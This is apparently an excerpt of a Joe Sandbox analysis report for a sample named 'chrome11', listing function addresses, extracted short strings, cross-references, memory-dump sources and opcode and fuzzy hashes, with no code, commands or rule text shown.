Opcode ID: 093d56ea2537db57e9fc5666be81ac43b6427bb5e3ffff3f7e8d547c967c4cb4
Instruction ID: b52c50b495e191007ed82a69e798b68ee23cb0222e0599c7e505f4baa4d77478
Opcode Fuzzy Hash: 093d56ea2537db57e9fc5666be81ac43b6427bb5e3ffff3f7e8d547c967c4cb4
Instruction Fuzzy Hash: B1221770A086498FDF98DF58C895AADB7F2FF58304F1446A9D41EE7296CB34E842CB41

Function 00007FF887E0326D Relevance: 4.4, Strings: 3, Instructions: 677
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p[J, xrefs: 00007FF887E038EE
p[J, xrefs: 00007FF887E0377B
+_H, xrefs: 00007FF887E03874

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID: p[J$p[J$+_H
API String ID: 0-365840550
Opcode ID: bcc96a2a2f35063378c4723c0d47d8ec1c30a74ff154e7b7372387eafbcc616f
Instruction ID: af46808ff73f899ab87ff7a8a4748b48805c6ea2176065bd53b9f44c94845df1
Opcode Fuzzy Hash: bcc96a2a2f35063378c4723c0d47d8ec1c30a74ff154e7b7372387eafbcc616f
Instruction Fuzzy Hash: 4C329A31C4868E8FDB45EF68C8956EDBBB1FF59340F0401BAE409D7292DB38A945CB81

Function 00007FF887E0036D Relevance: 4.4, Strings: 3, Instructions: 621
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6H, xrefs: 00007FF887E00427
r6H, xrefs: 00007FF887E0071E
"9H, xrefs: 00007FF887E00383

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID: "9H$r6H$r6H
API String ID: 0-933648691
Opcode ID: 64a176ba6e2dfb7f2c32cf85722b9599f452b1424478daa0aa5409fd26c50cf3
Instruction ID: a408ac869b33495ef07f92865956420c0d2c24c570438dcbc68aa1eeb3c88f50
Opcode Fuzzy Hash: 64a176ba6e2dfb7f2c32cf85722b9599f452b1424478daa0aa5409fd26c50cf3
Instruction Fuzzy Hash: 14227170948A8D8FDB85DF18C895AAE7BF1FF58740F0401AAE419C7296CB39E855CB81

Function 00007FF887DFBD15 Relevance: 4.3, Strings: 3, Instructions: 572
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0WR, xrefs: 00007FF887DFBEFA
b4H, xrefs: 00007FF887DFBFBD
b4H, xrefs: 00007FF887DFC20E

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID: 0WR$b4H$b4H
API String ID: 0-4283693081
Opcode ID: 17561780213e28a9ff63420a9143184d98bbc4025a30b990e67771905c36c367
Instruction ID: 3c6029ec6edfc36f7fdc7935a3bd7acaad4cbc878be7e0e9dafc1fc06f8e2676
Opcode Fuzzy Hash: 17561780213e28a9ff63420a9143184d98bbc4025a30b990e67771905c36c367
Instruction Fuzzy Hash: 4822A570D0864E8FDB45DFA8C895AEDBBB1FF58340F1442B9D40AD7296CB38A842CB51

Function 00007FF887DF2E71 Relevance: 3.9, Strings: 3, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6H, xrefs: 00007FF887DF2F1A
r6H, xrefs: 00007FF887DF2F4D
r6H, xrefs: 00007FF887DF2F80

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID: r6H$r6H$r6H
API String ID: 0-2701640910
Opcode ID: 63280b698dd05c8daa964b9e79f6adf6c8b3bce8711b80af056bc26d9186a661
Instruction ID: 2f532e1e6abdfd962e8543a274deb70038ceca34c5922bed3027e3ba873156ab
Opcode Fuzzy Hash: 63280b698dd05c8daa964b9e79f6adf6c8b3bce8711b80af056bc26d9186a661
Instruction Fuzzy Hash: 7C415071E18A4E8FDF84DF58D855AEEB7F1FFA8300F104666D409D725ACA34A852CB80

Function 00007FF887E00480 Relevance: 3.6, Strings: 2, Instructions: 1104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6H, xrefs: 00007FF887E00AD3
r6H, xrefs: 00007FF887E0071E

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID: r6H$r6H
API String ID: 0-661526703
Opcode ID: c00948cc749d8d8afaff430239f5a7837eec9d4dd430a997324470c0bc3ec268
Instruction ID: 499fea76644b6dc448e3b09962afbe8f9069da9b8290b7906237f23423fbe484
Opcode Fuzzy Hash: c00948cc749d8d8afaff430239f5a7837eec9d4dd430a997324470c0bc3ec268
Instruction Fuzzy Hash: 4A82A570948A8D8FDB85EF68C855AED7BF1FF59340F0401AAE419D7292CB38E855CB81

Function 00007FF887E00510 Relevance: 3.5, Strings: 2, Instructions: 1020
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6H, xrefs: 00007FF887E00AD3
r6H, xrefs: 00007FF887E0071E

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID: r6H$r6H
API String ID: 0-661526703
Opcode ID: 8e3bf551c41beb07f701082b094a19a907be209a2a22409847d7972011369a14
Instruction ID: 1bb46356c3acbc2a9c74b7c22e16ebed5e7b4c7eee91ccc25ced3034b4d4f37a
Opcode Fuzzy Hash: 8e3bf551c41beb07f701082b094a19a907be209a2a22409847d7972011369a14
Instruction Fuzzy Hash: 9372B570948A8E8FDB85EF68C855AED7BF1FF59340F0401AAD419D7292CB38E855CB81

Function 00007FF887DFDB2E Relevance: 3.4, Strings: 2, Instructions: 915
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

A,_H, xrefs: 00007FF887DFE372
r6H, xrefs: 00007FF887DFDD44

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID: A,_H$r6H
API String ID: 0-123315464
Opcode ID: 62a63fac542fd7338888f4727f5f0fd548f1301b212c93a8cc421e3a5c56ad6e
Instruction ID: 2da5e5d6995638fe500440b40a84ef9be68cd4e0f81eb202eff8d02b9e65d616
Opcode Fuzzy Hash: 62a63fac542fd7338888f4727f5f0fd548f1301b212c93a8cc421e3a5c56ad6e
Instruction Fuzzy Hash: 7C627E30D18A8D8FEB85EF68C855AEDBBF1FF59340F0401AAD409D7296DB34A985CB41

Function 00007FF887DF7FDD Relevance: 3.1, Strings: 2, Instructions: 614
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6H, xrefs: 00007FF887DF8492
r6H, xrefs: 00007FF887DF83F9

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID: r6H$r6H
API String ID: 0-661526703
Opcode ID: f12f906c73d1605a90f72df83de26963ede97f0e5ec264d622629a4681cfc7a0
Instruction ID: 51fbf3854d726b2a6de99331aabcdb44fbf57f52ea3447b0e00c6900b04c0e66
Opcode Fuzzy Hash: f12f906c73d1605a90f72df83de26963ede97f0e5ec264d622629a4681cfc7a0
Instruction Fuzzy Hash: D822B370948A8D8FDB85DF68C885AEDBBF1FF59340F0441AAE409D7296CB34E855CB81

Function 00007FF887E003CD Relevance: 3.1, Strings: 2, Instructions: 587
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6H, xrefs: 00007FF887E00427
r6H, xrefs: 00007FF887E0071E

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID: r6H$r6H
API String ID: 0-661526703
Opcode ID: c3eeeb32457d8c3457610dd9674da8b00beecbd76744c528d0ef2e1f7aad9e79
Instruction ID: f7f94ece7c536473d34d2fc4706ab58f3b8647a33b9d1fc451e5a68a658f9b85
Opcode Fuzzy Hash: c3eeeb32457d8c3457610dd9674da8b00beecbd76744c528d0ef2e1f7aad9e79
Instruction Fuzzy Hash: 2622817094C68D8FDB89DF28C895AAD7BF1FF59340F0401AAE459C7292CB39E855CB81

Function 00007FF887E0667B Relevance: 3.1, Strings: 2, Instructions: 582
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p[J, xrefs: 00007FF887E0670D
/H, xrefs: 00007FF887E06BBB

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID: p[J$/H
API String ID: 0-798110143
Opcode ID: 24b1166181f3e791d39aa89e70fc64e20ca16ff8981f39dd2e3cd12c87b31fc0
Instruction ID: df7808b371ffdaf1bbf8384d94bf791cef67b2dac866a36a9e9edd47d19d8017
Opcode Fuzzy Hash: 24b1166181f3e791d39aa89e70fc64e20ca16ff8981f39dd2e3cd12c87b31fc0
Instruction Fuzzy Hash: 2E228930908A5D8FDB95EF68C8957EDBBB1FF5A340F1440EAD009D7292DB38A985CB41

Function 00007FF887DF3B4F Relevance: 2.9, Strings: 1, Instructions: 1686COMMON

Download Yara Rule

Strings

r6H, xrefs: 00007FF887DF40B5

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID: r6H
API String ID: 0-4091206214
Opcode ID: 863ac1de638558ee0a6c87124bc9ea0f0d1bf6d8261bd743cba445db280f50fa
Instruction ID: 2ea97d086f7b09e01ff0534a20edc3e1c6b80845521ecc77764342ae5eee2035
Opcode Fuzzy Hash: 863ac1de638558ee0a6c87124bc9ea0f0d1bf6d8261bd743cba445db280f50fa
Instruction Fuzzy Hash: A3E2E870A09A59CFEB99EB18C894BA8B7F1FF59340F5441E9D04DE72A6CA349D85CF00

Function 00007FF887E070D9 Relevance: 2.8, Strings: 2, Instructions: 282COMMON

Download Yara Rule

Strings

p[J, xrefs: 00007FF887E07168
12_H, xrefs: 00007FF887E0718D

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID: 12_H$p[J
API String ID: 0-1182768348
Opcode ID: 4c7c358a5a2eda55a0d63318034ef12a76b0fb9b67b5533bede80c229c55f79a
Instruction ID: 16170a4a73f9a910b5aa0308d4d886d4e34f91824053b8d9b0f1dec9602d0903
Opcode Fuzzy Hash: 4c7c358a5a2eda55a0d63318034ef12a76b0fb9b67b5533bede80c229c55f79a
Instruction Fuzzy Hash: 5BA18870D4865E8FEBA4DB68C8947EDB7B1FF65780F4441BAD00DE7292CA386985CB40

Function 00007FF887E01B81 Relevance: 2.8, Strings: 2, Instructions: 265COMMON

Download Yara Rule

Strings

p[J, xrefs: 00007FF887E01DE6
p[J, xrefs: 00007FF887E01C20

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID: p[J$p[J
API String ID: 0-801153983
Opcode ID: 6fcc26f09a3020d486fba98df45c53f294d3d7469d272065afdab8a963b90589
Instruction ID: 61ecf3005586a3fb2749803965e0df32ac1d41329b34689f117660d313d66fb4
Opcode Fuzzy Hash: 6fcc26f09a3020d486fba98df45c53f294d3d7469d272065afdab8a963b90589
Instruction Fuzzy Hash: 04915671D08A5D8FEB94EF68D8557ADBBB1FF59740F5000AAD00DE7292DB38A881CB41

Function 00007FF887E04052 Relevance: 2.8, Strings: 2, Instructions: 253COMMON

Download Yara Rule

Strings

/H, xrefs: 00007FF887E04092
XK, xrefs: 00007FF887E040E0

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID: XK$/H
API String ID: 0-1786878472
Opcode ID: 32e2efd4a6963b54afe11c28c77faa41bf18abdd4dab019f9df7f457db916c47
Instruction ID: b21ca6e5682be99fff0e7a34e1b4a9cff8e550443a7f39b8997ac446f2cd12a8
Opcode Fuzzy Hash: 32e2efd4a6963b54afe11c28c77faa41bf18abdd4dab019f9df7f457db916c47
Instruction Fuzzy Hash: 38A12970E08A5D8FDB98DF68C494BADB7B2FF5A340F1041AAD00DE7695CB386985CB40

Function 00007FF887E07410 Relevance: 1.8, Strings: 1, Instructions: 578COMMON

Download Yara Rule

Strings

p[J, xrefs: 00007FF887E078F5

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID: p[J
API String ID: 0-1975058490
Opcode ID: ee1430493785148b7e8b20b0f3184e456ca6948d7277b57b307f0728a6f026a0
Instruction ID: 450f04913ce69cc740c85c0dd8e724732abd1a43f02b24cbcd29a3c11c28e593
Opcode Fuzzy Hash: ee1430493785148b7e8b20b0f3184e456ca6948d7277b57b307f0728a6f026a0
Instruction Fuzzy Hash: BF12BF31D48A5E8FDB94DF68D8446EDBBB0FF65340F1401BAD409D7282DB39A955CB80

Function 00007FF887E00433 Relevance: 1.8, Strings: 1, Instructions: 563COMMON

Download Yara Rule

Strings

r6H, xrefs: 00007FF887E0071E

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID: r6H
API String ID: 0-4091206214
Opcode ID: 7c2c6665a1178c0498e6313c68e306f3e87749685bf9c14b873fa46077a2dbb9
Instruction ID: 5d72e421da3fe9ab7815c5d95c817caa69a529c2bad50e96aacbf0479c9cc6c2
Opcode Fuzzy Hash: 7c2c6665a1178c0498e6313c68e306f3e87749685bf9c14b873fa46077a2dbb9
Instruction Fuzzy Hash: DA12717094CA8D8FDB89DF18C895AAD7BF1FF59340F0401AAE419C7296CB39E855CB81

Function 00007FF887C0ABD2 Relevance: 1.6, APIs: 1, Instructions: 127networkCOMMON

Download Yara Rule

APIs

InternetSetOptionA.WININET ref: 00007FF887C0AC86

Memory Dump Source

Source File: 00000000.00000002.1480741877.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887c00000_chrome11.jbxd

Similarity

API ID: InternetOption
String ID:
API String ID: 3327645240-0
Opcode ID: bc7e75f3640df9aeb5d220d6e5275615ab09d6da3813832522a5eedbead03e99
Instruction ID: 01456fe265fce3b908b4d07cbc312e1c8c1a14a68ebad0bde69c3045935433fd
Opcode Fuzzy Hash: bc7e75f3640df9aeb5d220d6e5275615ab09d6da3813832522a5eedbead03e99
Instruction Fuzzy Hash: 6731083190CB489FDB189BA8DC456F97BF0FF5A321F04427EE049D3192CA79A846C791

Function 00007FF887DF574D Relevance: 1.6, Strings: 1, Instructions: 331COMMON

Download Yara Rule

Strings

r6H, xrefs: 00007FF887DF5A49

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID: r6H
API String ID: 0-4091206214
Opcode ID: 29c7373888e2e32312c5f587e1e2341be78c3d8291982124144a112e574481bf
Instruction ID: b732e962148e40e1303237a499079d2c75bee5b66a5e4069712722d68bb9f529
Opcode Fuzzy Hash: 29c7373888e2e32312c5f587e1e2341be78c3d8291982124144a112e574481bf
Instruction Fuzzy Hash: A6B1AE71958A8E8FDB45DF68C8556ED7BF1FF58350F04027AE40AD3285DB38A846CB81

Function 00007FF887DF8F79 Relevance: 1.5, Strings: 1, Instructions: 263COMMON

Download Yara Rule

Strings

r6H, xrefs: 00007FF887DF9058

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID: r6H
API String ID: 0-4091206214
Opcode ID: dfda80ca5b36da4d356c8ba7db409714c29ad8197d64684c2f5f048bcd5921e9
Instruction ID: 82f31e43adba8f138dc3631302669fc39b9c0070693eb18d22d2f5f636e8576a
Opcode Fuzzy Hash: dfda80ca5b36da4d356c8ba7db409714c29ad8197d64684c2f5f048bcd5921e9
Instruction Fuzzy Hash: D5915D70A58A4D8FDB88EF18C895AED77B1FF58344F14067DE44AD3286CE38A941CB81

Function 00007FF887E01745 Relevance: 1.5, Strings: 1, Instructions: 207COMMON

Download Yara Rule

Strings

p[J, xrefs: 00007FF887E0183D

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID: p[J
API String ID: 0-1975058490
Opcode ID: 2a4e24cec72b4542166bc1517dcf34011a6b829109e121a2c4b02ff2afa6bc48
Instruction ID: a2c321d582387f7e466075d82645d01e044f55edde537d303b59cb90a045a0da
Opcode Fuzzy Hash: 2a4e24cec72b4542166bc1517dcf34011a6b829109e121a2c4b02ff2afa6bc48
Instruction Fuzzy Hash: 1F714670D48699CFEB54DFA8C8556EDBBF1FF09740F50007AE409EB282DA38A985CB51

Function 00007FF887DF8420 Relevance: 1.4, Strings: 1, Instructions: 141COMMON

Download Yara Rule

Strings

r6H, xrefs: 00007FF887DF8492

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID: r6H
API String ID: 0-4091206214
Opcode ID: 8c1df400410d542de9cddedff0adc6e0bd3029c89eb7c7a574caa23d5686db71
Instruction ID: d4ec1f34b2f6e34bf2977e84bd7902dd0783775696b191494bff14b20d5e6c81
Opcode Fuzzy Hash: 8c1df400410d542de9cddedff0adc6e0bd3029c89eb7c7a574caa23d5686db71
Instruction Fuzzy Hash: D451E270A1864D8FCF88DF58D881AAEBBF1FF58304F1486A9E409E7245C734E991CB81

Function 00007FF887DF75E0 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

0WR, xrefs: 00007FF887DF7618

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID: 0WR
API String ID: 0-717002791
Opcode ID: 3b2423fd7f6b5e5d28cbaa5cb18c6fed54d5ecb1e55c34ada40c2540c31f7911
Instruction ID: a718804e4a55b82ad813a1c85f77565373338be0af407efed11017282c046358
Opcode Fuzzy Hash: 3b2423fd7f6b5e5d28cbaa5cb18c6fed54d5ecb1e55c34ada40c2540c31f7911
Instruction Fuzzy Hash: 17315070928A4D8FDB48EF5CC8959ECB7F1FF58744F840169E45AD7295CB34A852CB40

Function 00007FF887DFC38E Relevance: 1.2, Instructions: 1189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d071f093879cfeae3cf05fb4a9fa2c525da0988449e1bc88c4a318995a28359
Instruction ID: cb2b86c15bf30e8a57b19e8310809dfddbefc6d8e6edb50f79df0bac69998aa6
Opcode Fuzzy Hash: 9d071f093879cfeae3cf05fb4a9fa2c525da0988449e1bc88c4a318995a28359
Instruction Fuzzy Hash: 41A2A27095464E8FDF05DF58C891AEDBBB2FF88304F148669D41AD724ACB38B852CB91

Function 00007FF887E07E49 Relevance: .8, Instructions: 804COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e3cced1b69bcef3fbaf21f0acb9a9b89efb0868f3cc7bb894e511565382e3cd
Instruction ID: a3e372eb5aeeae81a868c99ab9999f45e832024e66420e94729d538d61dc80ce
Opcode Fuzzy Hash: 0e3cced1b69bcef3fbaf21f0acb9a9b89efb0868f3cc7bb894e511565382e3cd
Instruction Fuzzy Hash: 3E526A3084968D8FEB59EF68C8957EDBBB1FF1A340F1400BAD449D7292CB399985CB41

Function 00007FF887DF9D0D Relevance: .7, Instructions: 659COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8eec0745f2238a89cb995971a5359e738b8c2d008e089e470b02592fc2890bd7
Instruction ID: 32f5ac6fd5d37da207ee1658f629d571868bbd592c433205786f0b00ae39afe0
Opcode Fuzzy Hash: 8eec0745f2238a89cb995971a5359e738b8c2d008e089e470b02592fc2890bd7
Instruction Fuzzy Hash: 5A22B071D48A4E9FDB84EF68C8556EDBBF1FF59340F0401BAD409D3296DA38A846C781

Function 00007FF887DF85D8 Relevance: .6, Instructions: 606COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa433f7476f09fda25196cb2869af9a7c253697d464c795194267b2f93529526
Instruction ID: 63f320fcf52f6cee05f91c028529ee3a25c4f249c29c131b57c7835a233bc56b
Opcode Fuzzy Hash: fa433f7476f09fda25196cb2869af9a7c253697d464c795194267b2f93529526
Instruction Fuzzy Hash: 1312A071D48A4E9FDB84EF68C8556EDBBF1FF59340F0401BAD409D3296DA38A846C781

Function 00007FF887E050F0 Relevance: .4, Instructions: 407COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5b970802a9cbcf776eaccf589175a525b6c2cb1a0eb06e51cf574d9e94d139e
Instruction ID: e6d919e82ff9666301269d958048513969115d26d9fa8548e51f73df7f275a5c
Opcode Fuzzy Hash: e5b970802a9cbcf776eaccf589175a525b6c2cb1a0eb06e51cf574d9e94d139e
Instruction Fuzzy Hash: C681D331E4CF4A9FEB99DA7C94699B93BF1FF59B50704017AD409C3296DE28AC02C781

Function 00007FF887E07449 Relevance: .4, Instructions: 373COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 637e9b3029b7f6fcb0ddd57a9b568db28ec4f962007601362413d21e801c21fe
Instruction ID: 71eaaaf70d86d3aa9d687201695f41b8fbcefbaac858e05d122c37c97403a4b1
Opcode Fuzzy Hash: 637e9b3029b7f6fcb0ddd57a9b568db28ec4f962007601362413d21e801c21fe
Instruction Fuzzy Hash: CDD1CE3084868E8FDB95DF68C8556ED7BB1FF69340F0801BAD409D7292DB39A945CB81

Function 00007FF887E06389 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b92a8a7dbbc203f81d33559181e24ed6e3bbf9c8fe50cc924aa5450b2bef4352
Instruction ID: 8c29029c03c51c2b2319f1d6c2e7fabf4fa96307fc42f1507417ecaf49254445
Opcode Fuzzy Hash: b92a8a7dbbc203f81d33559181e24ed6e3bbf9c8fe50cc924aa5450b2bef4352
Instruction Fuzzy Hash: B3B1CF3084968A8FDB56DF24C8557ED7BB1FF5A340F1401BAE409D7292CB3DA985CB81

Function 00007FF887E07F18 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51285cbcca21f806780997e476ba5e26a588d86129c991474f827161b9d67580
Instruction ID: b2fe272ffbffe8cb9b94bdc024ddff7345310b5c502d4f1107b6759db4385ad4
Opcode Fuzzy Hash: 51285cbcca21f806780997e476ba5e26a588d86129c991474f827161b9d67580
Instruction Fuzzy Hash: 2191CB3188D68E8FDB56EF6488552ED7BB0FF06350F0401BBE458C3192DB799A59CB82

Function 00007FF887E03939 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a140d766f5ee433f9dc71046a8a8811541f1d3deef42c30873df735d9574c15
Instruction ID: d44a7b27c826294f6cc78f9cff8c03ec98378960c4af415a9d40f3c780f0ee85
Opcode Fuzzy Hash: 1a140d766f5ee433f9dc71046a8a8811541f1d3deef42c30873df735d9574c15
Instruction Fuzzy Hash: D871DD3198C68D8FDB85EF68D8556EDBBB0FF4A310F0401BEE00DE3192CA299955CB91

Function 00007FF887DF1CD7 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8547e78a07de27eb45d2eae23de80db12c09323d6d28378d3afbca432cb44320
Instruction ID: dfd8fb136b2ab0108481afd7267d5afc18e06f52d84022d8d9b389089dc749cb
Opcode Fuzzy Hash: 8547e78a07de27eb45d2eae23de80db12c09323d6d28378d3afbca432cb44320
